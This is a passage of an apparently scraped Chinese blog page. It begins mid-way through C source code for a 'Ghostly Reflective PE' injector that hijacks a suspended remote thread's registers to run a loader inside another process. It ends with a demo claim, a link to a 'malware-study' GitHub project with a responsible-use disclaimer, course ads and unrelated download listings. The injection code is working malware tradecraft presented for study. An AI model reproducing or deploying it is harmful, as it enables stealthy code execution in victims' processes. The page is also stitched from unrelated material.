<span style="color:#242424"><span style="background-color:#f9f9f9">   CREATE_SUSPENDED,</span></span>
<span style="color:#242424"><span style="background-color:#f9f9f9">   &threadId</span></span>
<span style="color:#242424"><span style="background-color:#f9f9f9">  );</span></span>
  <span style="color:#aa0d91"><span style="background-color:#f9f9f9">if</span></span><span style="color:#242424"><span style="background-color:#f9f9f9"> (hTargetThread == </span></span><span style="color:#aa0d91"><span style="background-color:#f9f9f9">NULL</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">) </span></span><span style="color:#aa0d91"><span style="background-color:#f9f9f9">goto</span></span><span style="color:#242424"><span style="background-color:#f9f9f9"> CLEANUP;</span></span>
  <span style="color:#5c2699"><span style="background-color:#f9f9f9">printf</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">(</span></span><span style="color:#c41a16"><span style="background-color:#f9f9f9">"Remote thread %d created for Target DLL execution, start address: 0x%p\n"</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">, threadId, dllLoaderInTargetAddressOfLoadFunction);</span></span>
<span style="color:#242424"><span style="background-color:#f9f9f9"> }</span></span>
 <span style="color:#aa0d91"><span style="background-color:#f9f9f9">if</span></span><span style="color:#242424"><span style="background-color:#f9f9f9"> (hTargetThread == </span></span><span style="color:#aa0d91"><span style="background-color:#f9f9f9">NULL</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">) </span></span><span style="color:#aa0d91"><span style="background-color:#f9f9f9">goto</span></span><span style="color:#242424"><span style="background-color:#f9f9f9"> CLEANUP;</span></span>

 <span style="color:#007400"><span style="background-color:#f9f9f9">// Get target thread context</span></span>
<span style="color:#242424"><span style="background-color:#f9f9f9"> CONTEXT targetThreadContext;</span></span>
 <span style="color:#5c2699"><span style="background-color:#f9f9f9">RtlZeroMemory</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">(&targetThreadContext, </span></span><span style="color:#5c2699"><span style="background-color:#f9f9f9">sizeof</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">(CONTEXT));</span></span>
<span style="color:#242424"><span style="background-color:#f9f9f9"> targetThreadContext.ContextFlags = CONTEXT_ALL;</span></span>
 <span style="color:#aa0d91"><span style="background-color:#f9f9f9">if</span></span><span style="color:#242424"><span style="background-color:#f9f9f9"> (!</span></span><span style="color:#5c2699"><span style="background-color:#f9f9f9">GetThreadContext</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">(hTargetThread, &targetThreadContext)) </span></span><span style="color:#aa0d91"><span style="background-color:#f9f9f9">goto</span></span><span style="color:#242424"><span style="background-color:#f9f9f9"> CLEANUP;</span></span>

 <span style="color:#007400"><span style="background-color:#f9f9f9">// Patch target thread's RIP to point to Entry point</span></span>
<span style="color:#242424"><span style="background-color:#f9f9f9"> targetThreadContext.Rip = (DWORD64)dllLoaderInTargetAddressOfLoadFunction;</span></span>
<span style="color:#242424"><span style="background-color:#f9f9f9"> targetThreadContext.Rcx = (DWORD64)targetPESectionNameAddress;</span></span>
 <span style="color:#aa0d91"><span style="background-color:#f9f9f9">if</span></span><span style="color:#242424"><span style="background-color:#f9f9f9"> (!</span></span><span style="color:#5c2699"><span style="background-color:#f9f9f9">SetThreadContext</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">(hTargetThread, &targetThreadContext)) </span></span><span style="color:#aa0d91"><span style="background-color:#f9f9f9">goto</span></span><span style="color:#242424"><span style="background-color:#f9f9f9"> CLEANUP;</span></span>
 <span style="color:#5c2699"><span style="background-color:#f9f9f9">printf</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">(</span></span><span style="color:#c41a16"><span style="background-color:#f9f9f9">"Target thread's RIP set to 0x%p (start address)\n"</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">, dllLoaderInTargetAddressOfLoadFunction);</span></span>
 <span style="color:#5c2699"><span style="background-color:#f9f9f9">printf</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">(</span></span><span style="color:#c41a16"><span style="background-color:#f9f9f9">"Target thread's RCX set to 0x%p (first param; address of section name for Target DLL)\n"</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">, targetPESectionNameAddress);</span></span>

 <span style="color:#007400"><span style="background-color:#f9f9f9">// Resume process</span></span>
 <span style="color:#aa0d91"><span style="background-color:#f9f9f9">if</span></span><span style="color:#242424"><span style="background-color:#f9f9f9"> (</span></span><span style="color:#5c2699"><span style="background-color:#f9f9f9">ResumeThread</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">(hTargetThread) == </span></span><span style="color:#1c00cf"><span style="background-color:#f9f9f9">-1</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">) </span></span><span style="color:#aa0d91"><span style="background-color:#f9f9f9">goto</span></span><span style="color:#242424"><span style="background-color:#f9f9f9"> CLEANUP;</span></span>
 <span style="color:#5c2699"><span style="background-color:#f9f9f9">printf</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">(</span></span><span style="color:#c41a16"><span style="background-color:#f9f9f9">"Target thread resumed\n"</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">);</span></span>

 <span style="color:#007400"><span style="background-color:#f9f9f9">// Wait for target thread to finish</span></span>
 <span style="color:#5c2699"><span style="background-color:#f9f9f9">printf</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">(</span></span><span style="color:#c41a16"><span style="background-color:#f9f9f9">"Waiting for target thread to finish\n"</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">);</span></span>
 <span style="color:#5c2699"><span style="background-color:#f9f9f9">WaitForSingleObject</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">(hTargetThread, INFINITE);</span></span>
 <span style="color:#5c2699"><span style="background-color:#f9f9f9">printf</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">(</span></span><span style="color:#c41a16"><span style="background-color:#f9f9f9">"Target thread finished\n"</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">);</span></span>

<span style="color:#242424"><span style="background-color:#f9f9f9"> isSuccess = </span></span><span style="color:#aa0d91"><span style="background-color:#f9f9f9">true</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">;</span></span>

<span style="color:#242424"><span style="background-color:#f9f9f9">CLEANUP:</span></span>
 <span style="color:#aa0d91"><span style="background-color:#f9f9f9">if</span></span><span style="color:#242424"><span style="background-color:#f9f9f9"> (!injectLocal && pProcessAll != </span></span><span style="color:#aa0d91"><span style="background-color:#f9f9f9">NULL</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">)</span></span>
  <span style="color:#5c2699"><span style="background-color:#f9f9f9">HeapFree</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">(</span></span><span style="color:#5c2699"><span style="background-color:#f9f9f9">GetProcessHeap</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">(), </span></span><span style="color:#1c00cf"><span style="background-color:#f9f9f9">0</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">, pProcessAll);</span></span>

 <span style="color:#aa0d91"><span style="background-color:#f9f9f9">if</span></span><span style="color:#242424"><span style="background-color:#f9f9f9"> (hTargetThread != </span></span><span style="color:#aa0d91"><span style="background-color:#f9f9f9">NULL</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">) </span></span><span style="color:#5c2699"><span style="background-color:#f9f9f9">CloseHandle</span></span><span style="color:#242424"><span style="background-color:#f9f9f9">(hTargetThread);</span></span>

 <span style="color:#aa0d91"><span style="background-color:#f9f9f9">return</span></span><span style="color:#242424"><span style="background-color:#f9f9f9"> isSuccess;</span></span>
<span style="color:#242424"><span style="background-color:#f9f9f9">}</span></span></span></span></span>

演示

使用 Reflective Ghostly PE 注入在远程进程中注入 Messagebox DLL

就这样,它成功了。我花了 3 天时间编写所有内容,排除潜在问题,了解某些事情为什么不起作用,然后找到解决方法。

完整代码

这是完整的项目。

malware-study/Ghostly Reflective PE Loader 位于主页 · captain-woof/malware-study

我的项目旨在了解恶意软件的开发和检测。请负责任地使用。如果您因此导致任何损失,我概不负责……

github.com

发布版本将包含 Loader DLL 的标准 C 和 C++ 库,某些内容将会中断。您必须自行移除它们。要按原样进行测试,请使用调试版本。

帮助调试,TestDLLTestEXE作为目标 PE 工作。注入任一以查看其运行情况。它会弹出一个消息框。此外,TestTargetProcess无限期运行以允许Injector使用它。在启动项目中,选择它和 Injector,确保 Injector 在 TestTargetProcess 之后启动。

参考

其它相关课程

图片

图片

图片

图片

图片

rust语言全栈开发视频教程-第一季(2025最新)

图片

图片

图片

详细目录

mac/ios安全视频

图片

QT开发底层原理与安全逆向视频教程

图片

linux文件系统存储与文件过滤安全开发视频教程(2024最新)

图片

linux高级usb安全开发与源码分析视频教程

图片

linux程序设计与安全开发

图片

 

 

  • 图片

  • windows网络安全防火墙与虚拟网卡(更新完成)

  • 图片

  • windows文件过滤(更新完成)

  • 图片

  • USB过滤(更新完成)

  • 图片

  • 游戏安全(更新中)

  • 图片

  • ios逆向

  • 图片

  • windbg

  • 图片

  • 还有很多免费教程(限学员)

  • 图片

    图片

    图片

  • 图片

  • windows恶意软件开发与对抗视频教程

  • 图片

  • 图片

  • 图片

机械工程中圆锥滚子轴承载荷分布曲线程序及其动力学模型验证 v1.5
05-30
内容概要:本文介绍了一款用于计算圆锥滚子轴承载荷分布曲线的程序。该程序旨在与圆锥滚子轴承的动力学模型(如有限元模型和自建代码动力学模型)进行对比,以验证模型的有效性和准确性。作者基于《滚动轴承设计原理》一书编写了这一程序,并在代码中加入了详尽的注释,便于读者对照书籍进行学习和推导。此外,文中还提供了部分代码片段,展示了如何计算载荷分布并绘制相应的曲线图。最后,作者分享了编写程序的学习心得,强调了这一工具在轴承设计和优化中的重要性。 适合人群:机械工程领域的研究人员和技术人员,尤其是那些对圆锥滚子轴承的载荷分布和动力学模型感兴趣的从业者。 使用场景及目标:① 验证圆锥滚子轴承动力学模型的有效性;② 提供一个实用的工具,帮助理解和优化圆锥滚子轴承的性能;③ 作为教学资源,辅助学生和初学者学习相关理论和编程技巧。 其他说明:本文不仅提供了具体的编程实现方法,还分享了宝贵的学习经验和心得,鼓励读者在实践中不断探索和创新。
基于OpenCV与QT开发的卡尺工具:工具跟随、自动纠偏、图像处理与形状匹配集成应用
05-30
内容概要:本文介绍了基于OpenCV与Qt开发的智能卡尺工具,该工具集成了图像采集、图像处理和自动纠偏功能,旨在提升工业制造中的测量精度和效率。文中详细阐述了系统的架构与功能,包括工具跟随、找线、找圆、颜色检测、形状匹配等高级功能。此外,还讨论了技术实现细节,如形状匹配与找线找圆算法的封装、Qt界面开发以及海康工业相机的集成。最后,强调了该系统作为学习资料的价值,涵盖计算机视觉、图像处理和Qt开发等方面。 适合人群:从事工业自动化、计算机视觉、图像处理和Qt开发的技术人员,尤其是希望深入了解图像处理技术和实际应用场景的研发人员。 使用场景及目标:适用于需要精确测量和图像处理的工业环境,如制造业生产线的质量检测环节。目标是提高测量精度和效率,减少人为误差。 其他说明:该系统不仅是一个实用的测量工具,也是一个宝贵的学习资源,提供了完整的源码和技术文档,有助于开发者深入理解和掌握相关技术。
MATLAB Simulink中两相交错并联双向DC-DC变换器的双闭环控制仿真及性能分析 · 仿真分析
05-30
内容概要:本文详细探讨了两相交错并联双向DC-DC变换器在MATLAB/Simulink环境下的电压电流双闭环控制仿真模型。文中介绍了基于4mos结构的变换器模型,并对其三种控制方式——单电压环开环控制、单电流环闭环控制和电压电流双闭环控制进行了详细的仿真和性能对比。研究表明,双闭环控制在电感电流均流、输出波形平滑度和电压纹波抑制等方面表现最优,显著提高了系统的稳定性和效率。 适合人群:从事电力电子领域的研究人员和技术人员,尤其是对DC-DC变换器及其控制策略感兴趣的读者。 使用场景及目标:适用于需要深入了解DC-DC变换器控制策略的研究人员和技术人员,帮助他们选择最合适的控制方式以提升系统性能。 其他说明:本文提供了丰富的仿真数据和图表,有助于读者直观地理解不同控制方式的效果。此外,附有参考文献,方便读者进一步查阅相关资料。
实训商业源码-PHP项目管理软件源码-毕业设计.zip
05-30
实训商业源码-PHP项目管理软件源码-毕业设计.zip
金融领域基于DeepSeek的股票交易自动化系统:人工智能深度学习量化交易策略与风险管理
05-30
内容概要:本文介绍了DeepSeek这款基于人工智能的量化交易软件实现股票交易自动化的成功案例。DeepSeek通过深度学习算法分析市场数据,预测股票价格走势并自动执行交易。使用前需要注册登录平台、连接交易账户、了解基本操作。接着,用户可以根据个人需求定制交易策略,包括数据分析、策略设计(如移动平均线策略)、回测等步骤。文中还强调了风险管理的重要性,如设置止损止盈点、仓位控制等措施。最后,在完成策略设计和风险管理后,可开启自动化交易,并定期监控交易结果,根据市场变化调整策略。; 适合人群:对股票交易自动化感兴趣的投资者,尤其是希望利用人工智能和深度学习技术优化交易策略的人士。; 使用场景及目标:①帮助用户理解DeepSeek软件的操作流程;②指导用户如何根据个人需求定制交易策略;③强调风险管理在自动化交易中的重要性;④介绍自动化交易的启动及监控方法。; 阅读建议:阅读时应重点关注DeepSeek的工作原理、策略定制的具体步骤以及风险管理的方法,同时结合示例代码进行实践操作,以便更好地掌握股票交易自动化的技巧。
PFC砂样二维直剪实验:代码解析与曲线分析助力岩土工程仿真 - 颗粒流仿真 宝典
05-30
内容概要:本文详细介绍了PFC(Particle Flow Code)案例7关于砂样二维直剪实验的内容。首先展示了代码源文件的关键部分,包括模型初始化、砂样创建、直剪力施加、模拟运行和结果输出。接着,通过对应力-应变曲线的分析,揭示了砂样在不同应变阶段的力学特性及其破坏模式。最后,总结了PFC在岩土工程仿真的应用价值,并对其未来发展进行了展望。 适合人群:从事岩土工程研究和技术开发的专业人士,尤其是对颗粒流仿真感兴趣的科研人员和工程师。 使用场景及目标:适用于需要理解和掌握PFC软件操作及砂样二维直剪实验原理的人群。目标是帮助读者深入了解砂样的力学行为,为实际工程项目提供理论支持和技术指导。 其他说明:本文不仅提供了详细的代码解析,还结合了具体的曲线分析,使读者能够全面理解整个实验过程。同时,文中提到的应力-应变曲线对于评估材料性能至关重要,有助于预测和防止工程事故的发生。
探索和预测社交行为和性格类型数据集( 2,900 行和 8 列)CSV
05-30
深入研究外向与内向人格特质数据集,这是一个丰富的行为和社会数据集合,旨在探索人类性格的范围。该数据集捕获了外向和内向的关键指标,使其成为心理学家、数据科学家和研究社交行为、性格预测或数据预处理技术的研究人员的宝贵资源。 外向和内向等人格特征塑造了个人与社会环境的互动方式。此数据集提供了对独处时间、社交活动参加和社交媒体参与等行为的见解,从而支持在心理学、社会学、营销和机器学习中的应用。无论您是预测性格类型还是分析社交模式,此数据集都是您发现迷人见解的门户。 数据集详细信息:数据集包含 2,900 行和 8 列。
实训商业源码-小家电电器类网站源码-毕业设计.zip
05-30
实训商业源码-小家电电器类网站源码-毕业设计.zip
基于MATLAB实现的变分模态分解方法研究
05-30
变分模态分解(Variational Mode Decomposition, VMD)是一种强大的非线性、无参数信号处理技术,专门用于复杂非平稳信号的分析与分解。它由Eckart Dietz和Herbert Krim于2011年提出,主要针对传统傅立叶变换在处理非平稳信号时的不足。VMD的核心思想是将复杂信号分解为一系列模态函数(即固有模态函数,IMFs),每个IMF具有独特的频率成分和局部特性。这一过程与小波分析或经验模态分解(EMD)类似,但VMD通过变分优化框架显著提升了分解的稳定性和准确性。 在MATLAB环境中实现VMD,可以帮助我们更好地理解和应用这一技术。其核心算法主要包括以下步骤:首先进行初始化,设定模态数并为每个模态分配初始频率估计;接着采用交替最小二乘法,通过交替最小化残差平方和以及模态频率的离散时间傅立叶变换(DTFT)约束,更新每个模态函数和中心频率;最后通过迭代优化,在每次迭代中优化所有IMF的幅度和相位,直至满足停止条件(如达到预设迭代次数或残差平方和小于阈值)。 MATLAB中的VMD实现通常包括以下部分:数据预处理,如对原始信号进行归一化或去除直流偏置,以简化后续处理;定义VMD结构,设置模态数、迭代次数和约束参数等;VMD算法主体,包含初始化、交替最小二乘法和迭代优化过程;以及后处理,对分解结果进行评估和可视化,例如计算每个模态的频谱特性,绘制IMF的时频分布图。如果提供了一个包含VMD算法的压缩包文件,其中的“VMD”可能是MATLAB代码文件或完整的项目文件夹,可能包含主程序、函数库、示例数据和结果可视化脚本。通过运行这些代码,可以直观地看到VMD如何将复杂信号分解为独立模态,并理解每个模态的物理意义。 VMD在多个领域具有广泛的应用,包括信号处理(如声学、振动、生物医学信号分析)、图像处理(如图像去噪、特征提取)、金融时间序列分析(识
计网实验拓扑资料,拓扑图,课程资料,文档
05-30
计网实验拓扑资料,拓扑图,课程资料,文档
异步电机无感FOC模型:高效、可靠且易于集成的矢量控制与VVVF模式 · 嵌入式系统 2024版
05-30
内容概要:本文详细介绍了异步电机无感FOC(Field-Oriented Control)模型及其矢量控制技术。首先解释了异步电机的特点,如可以在任意位置带载启动并在极低转速下满载运行。接着展示了如何将该模型直接编码并应用于支持浮点运算的单片机中,强调了模型基于有名值构建的优势。文中提供了关键的磁链观测和速度估算代码片段,以及针对嵌入式系统的代码生成配置方法。最后简述了VVVF(Variable Voltage Variable Frequency)模式的应用方式,并指出异步电机在低速时需要进行电压补偿以维持转矩稳定性。 适合人群:对电机控制有一定了解的技术人员,尤其是希望深入了解异步电机无感FOC模型及矢量控制原理的研发人员。 使用场景及目标:适用于想要掌握异步电机无感FOC模型的具体实现细节和技术难点的学习者;对于从事工业自动化、电力电子等领域工作的工程师来说,能够帮助他们更好地理解和应用这一先进技术。 其他说明:文章不仅提供了理论知识,还附有实际操作所需的代码示例,便于读者快速上手实践。同时提醒读者关注异步电机参数随环境变化而改变的问题,并提出解决方案。
TypeError Function cannot override external function with private visibility - 重写函数可见性错误(解决办法).md
05-30
TypeError Function cannot override external function with private visibility - 重写函数可见性错误(解决办法).md
计算机硬件基础知识.pptx
05-30
计算机硬件基础知识.pptx
Java设计定制】考勤导出系统 - 论文、源码、PPT全套.zip
05-30
通关大全套(论文,ppt,源码都给你),这是我用过的,改改名字直接拿去用就好了
基于VSG并网控制的小信号建模分析:模型对比与可靠性验证 - 并网控制 参考
05-30
内容概要:本文深入探讨了基于虚拟同步发电机(VSG)并网控制系统的建模与仿真。VSG技术为并网逆变器提供了类似同步发电机的惯性特征,是分布式发电和微电网的重要技术。文章首先介绍了VSG技术的基本概念,然后详细阐述了VSG功率回路的小信号建模方法,推导了线频平均小信号模型。接着,通过仿真对比验证了小信号模型的可靠性,证明其能够准确预测VSG并网控制系统的动态行为。最后,展示了使用Python实现VSG小信号建模和仿真的代码示例。 适合人群:电力电子、自动化控制、分布式能源系统等相关领域的研究人员和技术人员。 使用场景及目标:适用于从事分布式发电和微电网研究的技术人员,帮助他们理解VSG技术的工作原理,掌握小信号建模的方法,并通过仿真验证模型的可靠性,从而优化系统参数和提高系统稳定性。 其他说明:文中提供的代码示例有助于读者快速上手实践,进一步加深对VSG技术和小信号建模的理解。
基于Python的城通网盘多文件批量下载工具.zip
最新发布
05-30
基于Python的城通网盘多文件批量下载工具.zip
Python源码-游戏-53钓鱼.zip
05-30
Python源码-游戏-53钓鱼.zip
PFC 7.0版二维隧洞非平稳渗流模拟:差分法与颗粒流模拟的应用研究 - FISH语言 实战版
05-30
内容概要:本文介绍了使用PFC 7.0进行二维隧洞非平稳渗流模拟的研究。研究重点在于通过FISH语言编写差分法程序,实现对非平稳渗流现象的精细模拟。文中详细阐述了差分法的具体实现步骤,包括颗粒属性定义、相互作用力计算、速度和位置更新、流体压力场更新等关键环节。此外,还讨论了非平稳渗流模拟在地质工程中的重要性和应用前景。 适合人群:从事地质工程、岩土力学及相关领域的研究人员和技术人员。 使用场景及目标:适用于需要深入了解和模拟地下隧洞非平稳渗流现象的科研项目和工程项目。目标是提高对非平稳渗流的理解,优化工程设计方案,确保施工安全。 其他说明:本文不仅展示了具体的编程技术和模拟方法,还强调了非平稳渗流模拟的实际意义及其在未来研究中的潜在价值。
阻燃剂市场深度分析:绿色、环保型阻燃剂将成为市场的新宠.pdf
05-30
行业研究 ,新闻稿,简短分析
探索Ghostly字体的独特魅力与应用
标题和描述均为“Ghostly”,没有提供额外的信息,因此很难从标题和描述中提取知识点。然而,由于标签指定为“字体”,我们可以推断出该主题与字体设计、使用和相关软件有关。结合压缩文件名称“ghostly”,我们可以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

C-haidragon

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值